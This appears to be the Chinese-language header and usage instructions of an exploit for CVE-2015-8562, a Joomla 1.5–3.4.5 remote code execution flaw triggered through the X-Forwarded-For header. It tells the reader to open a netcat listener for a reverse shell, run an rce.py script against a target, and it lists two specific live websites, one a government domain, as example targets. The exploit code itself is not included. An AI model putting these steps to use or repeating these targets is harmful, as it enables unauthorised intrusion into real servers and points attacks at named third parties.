漏洞利用:Joomla 1.5 - 3.4.5 对象注入 RCE X-Forwarded-For 标头:
漏洞日期:2015年12月17日
漏洞利用作者:anarc0der
版本:Joomla 1.5 至 3.4.5
CVE:CVE-2015-8562
使用方法:
打开一个终端并使用nc监听:$ nc -lnvp 4444
打开另一个终端并执行漏洞利用:
python3 rce.py --target='target' --ip='ip' --port=4444
目标示例PoC(请不要滥用,仅供他人参考):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/